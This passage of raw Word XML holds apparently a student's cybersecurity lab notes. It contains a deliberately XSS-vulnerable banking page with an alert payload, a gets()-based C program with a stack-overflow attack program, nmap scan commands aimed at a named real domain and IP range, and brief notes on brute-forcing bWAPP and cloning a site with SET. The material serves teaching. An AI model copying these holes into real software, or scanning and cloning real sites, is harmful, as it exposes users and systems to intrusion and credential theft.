      </w:pPr>
      <w:r w:rsidRPr="00D659E8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Style.css-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFAD2C8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* {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13750D70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box-sizing: border-box;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C913FCE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3B498B91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0F7C0954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lastRenderedPageBreak/>
        <w:t>html {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E9237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font-family: sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BC1263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181A219B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3D87EF48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body {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F36AEF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margin: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5A1B21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6ECFA5B0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2F1455F0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section {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A319B8C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margin: 2rem auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C292F04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width: 90%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FD682B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max-width: 40rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9230E7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border-radius: 10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496B14B7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box-shadow: 0 2px 8px rgba(0, 0, 0, 0.26);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0681A1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background-color: white;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A7CC77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padding: 1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105BB5F1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295FA7AF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55B0A2D7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.form-control {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7463E9C5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margin: 1rem 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380C1856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430E7921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1D49B152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.form-control input,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F245176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.form-control textarea,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F55D7F6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.form-control label {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4AC5C5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display: block;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E91E265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width: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA70FA2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font: inherit;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0FBCFB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2FD197DE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16BBD959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.form-control label {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8DD990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font-weight: bold;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE045ED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margin-bottom: 0.5rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E75C0F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5BC35F73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71319ADD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.form-control input,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170EF331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.form-control textarea {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33946FA6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border: 1px solid #ccc;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608C0CC4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padding: 0.25rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D2B6C2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border-radius: 4px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BA1E78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242FD450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59F0B80F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.form-control input:focus,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D1FDBB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.form-control textarea:focus {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFFA016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border-color: #ffbb00;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AD4BD5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outline: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6442DAB5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background-color: #fcecc1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CD31A9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21F70D6B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1DCA8070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button {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAE15DC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cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D899C92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font: inherit;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63486C6C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border-radius: 6px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C744DD6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border: 1px solid black;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DB0C71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background-color: #ffbb00;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22793514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color: black;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF5F491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padding: 0.5rem 2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB43045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box-shadow: 1px 1px 2px rgba(0, 0, 0, 0.26);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ACBFDB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0948E08C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4BDAFFE0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button:focus {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9703E0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outline: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7C777F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51013C25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376D3EB2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button:hover,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750AF1AD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button:active {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE670D6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background-color: #f8cf60;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0683864E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7EC41987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44143CEA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#user-messages ul {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5771B400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padding: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4013396B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margin: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8E9A68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list-style: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C66E22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687BECD6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7539A974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.message-item {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4026AD91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margin: 0.5rem 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DD7935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padding: 0.5rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197F9E74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display: flex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEE8475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align-items: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5C5ED0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4EAE1107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06D00D9E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.message-image {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A7123A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width: 50px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0273453E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height: 50px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B340CE7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margin-right: 1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DFC84C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4213D5F0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</w:p>
    <w:p w14:paraId="0E033939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.message-item img {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB6FBCD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width: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E6B4E1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height: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B5C133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 xml:space="preserve">  border-radius: 50%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C1BAD7" w14:textId="77777777" w:rsidR="00D659E8" w:rsidRPr="00D659E8" w:rsidRDefault="00D659E8" w:rsidP="00D659E8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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D659E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C854CD" w14:textId="77777777" w:rsid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26C82D06" w14:textId="77777777" w:rsid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65EF25DF" w14:textId="77777777" w:rsidR="00D659E8" w:rsidRP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6771B7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9E3126">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Create Net Banking Web Page and Perform a reflected  cross-site scripting (XSS) attack on it . </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729F2102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>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC24249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>&lt;html lang="en"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0075CE67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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427BFDC4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&lt;meta charset="UTF-8" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C31276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&lt;title&gt;XSS Demo&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA7F808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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E32977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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BA9CE9" w14:textId="4B6181A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&lt;h1&gt;Welcome to Our </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Banking </w:t>
      </w:r>
      <w:r w:rsidRPr="004E02A2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Page&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202278F4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&lt;form action="" method="GET"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6586E81A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&lt;label for="name"&gt;Enter your name:&lt;/label&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038327E2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&lt;input type="text" id="name" name="name" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599DB4EF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&lt;button type="submit"&gt;Submit&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123318A2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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D44B03B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5F2995CF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&lt;div id="greeting"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5964FFE3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&lt;p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B99191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Hello,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741222F1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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D36B63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  document.write(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CBAE47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    decodeURIComponent(window.location.search.substring(6))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE99044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  );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A505C90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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FBF4AD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  ! Welcome to our website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E66E0E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  &lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E190DCA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  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0232DE38" w14:textId="77777777" w:rsidR="004E02A2" w:rsidRP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 xml:space="preserve">  &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721A1E69" w14:textId="7483CA08" w:rsid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 w:rsidRPr="004E02A2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08721E15" w14:textId="77777777" w:rsid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Vulnerable function- &lt;script&gt;alert(‘XSS ATTACK’)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7451C8" w14:textId="77777777" w:rsidR="004E02A2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4EC23F1" w14:textId="692C9A2E" w:rsidR="004E02A2" w:rsidRPr="009E3126" w:rsidRDefault="004E02A2" w:rsidP="004E02A2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0000006" w14:textId="77777777" w:rsidR="006771B7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yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C14A7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Create Net Banking Web Page and Perform a Stored  cross-site scripting (XSS) attack on it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF85100" w14:textId="52E3A360" w:rsidR="00D659E8" w:rsidRDefault="00D659E8" w:rsidP="00D659E8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r w:rsidRPr="00D659E8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SAME AS 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D659E8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12273F51" w14:textId="77777777" w:rsidR="00CA2689" w:rsidRPr="00D659E8" w:rsidRDefault="00CA2689" w:rsidP="00D659E8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81FC823" w14:textId="2D2C12C0" w:rsidR="00731539" w:rsidRDefault="005C14A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}Use </w:t>
      </w:r>
      <w:r w:rsidRPr="009F391C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NMAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform port scanning on the network of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Tech Startup Inc.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to locate malware and vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="009F391C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(inc42.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D702729" w14:textId="709840E7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nmap inc42.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD66A7E" w14:textId="225D1AAD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sudo nmap -sA inc42.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546E6652" w14:textId="0168FA38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nmap 169.148.148.*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CAC8A0" w14:textId="43FB0C52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nmap 169.148.148.67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C53FF6F" w14:textId="59846C45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nmap 169.148.148.25-29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E6D82A" w14:textId="6E2F2D18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sudo nmap -sS 169.148.148.67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1FB520" w14:textId="13C8C5BA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sudo nmap inc42.com -oG op.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407BD57E" w14:textId="4DB50735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nmap -iL input.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D29E491" w14:textId="4C387CD9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nmap -p 45-50 inc42.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D15647" w14:textId="23453FFB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sudo nmap –trace inc42.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7E7A68" w14:textId="16675F82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sudo nmap -O  inc42.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08887A94" w14:textId="77777777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0000008" w14:textId="77777777" w:rsidR="006771B7" w:rsidRPr="00427349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27349">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement a stack buffer overflow attack using a procedural language on the "Internal Inventory Management System". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43211AC3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(make folder on desktop-&gt;two-&gt;your_files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680C740B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0CCB598" w14:textId="5F7CD052" w:rsidR="00C33783" w:rsidRPr="00C9432F" w:rsidRDefault="00C33783" w:rsidP="00C33783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test</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.c-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C36058A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>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7F7764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>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081425B4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7F70CF0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>typedef struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB7FC8D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 xml:space="preserve">    char itemName[10];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C606AE3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 xml:space="preserve">    int quantity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F1731D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>} InventoryItem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED9E18C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7AE92AB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>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3DB004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 xml:space="preserve">    InventoryItem item;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C967A11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33D5DEAE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 xml:space="preserve">    printf("Enter item name (Max 10 characters): ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECC8078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 xml:space="preserve">    item.quantity = 100;  // Default quantity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76694B77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 xml:space="preserve">    gets(item.itemName);  // Vulnerable function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40810632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30D790A5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 xml:space="preserve">    printf("Item: %s, Quantity: %d\n", item.itemName, item.quantity);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D4D3AB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 xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193E84CE" w14:textId="77C93D21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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7999A6" w14:textId="77777777" w:rsidR="00C33783" w:rsidRPr="00C9432F" w:rsidRDefault="00C33783" w:rsidP="00C33783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attack.c-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ECA64D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lastRenderedPageBreak/>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B4ADD7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FC4E01C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>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067DF118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ED681D0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2896CCFC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63EFB21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>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4299EB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934F06A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 xml:space="preserve">    // Overflow the buffer and change the quantity to 999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621792F4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EF7DAAA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 xml:space="preserve">    printf("%s%c", "aaaaaaaaaaaa", '\x63');  // Assuming 0x63 is the value that sets quantity to 999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6D7887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58C8287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 xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB59D60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A78358E" w14:textId="77777777" w:rsidR="00C33783" w:rsidRP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 w:rsidRPr="00C33783">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C287C65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839053D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E8AAC3B" w14:textId="77777777" w:rsidR="00C33783" w:rsidRPr="00C9432F" w:rsidRDefault="00C33783" w:rsidP="00C33783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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FE40AF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Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D04269C" w14:textId="4ED7ED0A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eight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4349E884" w14:textId="11383F49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gcc -fno-stack-protector -o test test.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0569F27D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gdb test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C88536A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break main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F4F794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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CABC15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info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509E713B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disas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696ACB15" w14:textId="3453BF9D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x/20xw $rsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FDDEFD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next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66605B23" w14:textId="640921F8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(enter item’s name more than max 10 characters)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199535A5" w14:textId="35E08C64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p/x 999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C37ABF3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ECC34CF" w14:textId="77777777" w:rsidR="00C33783" w:rsidRPr="00C9432F" w:rsidRDefault="00C33783" w:rsidP="00C33783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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B12D77F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Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE1E4FF" w14:textId="2CD09EC2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eight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311AFDE1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gcc -o attack attack.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738A624C" w14:textId="7777777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./attack | ./test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A414C76" w14:textId="1EE9FB57" w:rsidR="00C33783" w:rsidRDefault="00C33783" w:rsidP="00C33783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0000009" w14:textId="51D9D779" w:rsidR="006771B7" w:rsidRDefault="005C14A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}Conduct a </w:t>
      </w:r>
      <w:r w:rsidRPr="0008404A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>brute force password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cracking attack on the login system of BWAPP. Username -  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>User1234</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and password will be a combination of letters a,b,c  of length 5.</w:t>
      </w:r>
      <w:r w:rsidR="0008404A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(abc123)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010CCF8D" w14:textId="77777777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</w:p>
    <w:p w14:paraId="0000000A" w14:textId="649A6240" w:rsidR="006771B7" w:rsidRDefault="00903E3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}Perform </w:t>
      </w:r>
      <w:r w:rsidRPr="00903E37">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>penetration testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>"HR Management Software"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify and exploit application vulnerabilities. </w:t>
      </w:r>
      <w:r w:rsidR="00CA2689">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(SET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601E4FA3" w14:textId="05E21089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</w:p>
    <w:p w14:paraId="5AD44F10" w14:textId="1DEA0AB5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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8D23E6" w14:textId="27A701F4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E02293" w14:textId="269B5C23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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447A2C4C" w14:textId="5913019B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Enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E68240" w14:textId="2217AE2E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 for cloning website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0396C7" w14:textId="6CFD652B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then copy your port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E93ABBF" w14:textId="77777777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</w:p>
    <w:p w14:paraId="0000000B" w14:textId="77777777" w:rsidR="006771B7" w:rsidRPr="00FB549B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FB549B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Develop a "Blogging Platform" that uses GET and POST methods. And identify and exploit vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EA6BC1" w14:textId="0F6D7A52" w:rsidR="008306EB" w:rsidRDefault="008306EB" w:rsidP="008306EB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folder in xampp/htdocs/blog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D69A4C4" w14:textId="3977A989" w:rsidR="008306EB" w:rsidRPr="008306EB" w:rsidRDefault="008306EB" w:rsidP="008306EB">
      <w:pPr>
        <w:ind w:left="360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8306EB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>index.</w:t>
      </w:r>
      <w:r w:rsidR="00FD4EC3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidRPr="008306EB">
        <w:rPr>
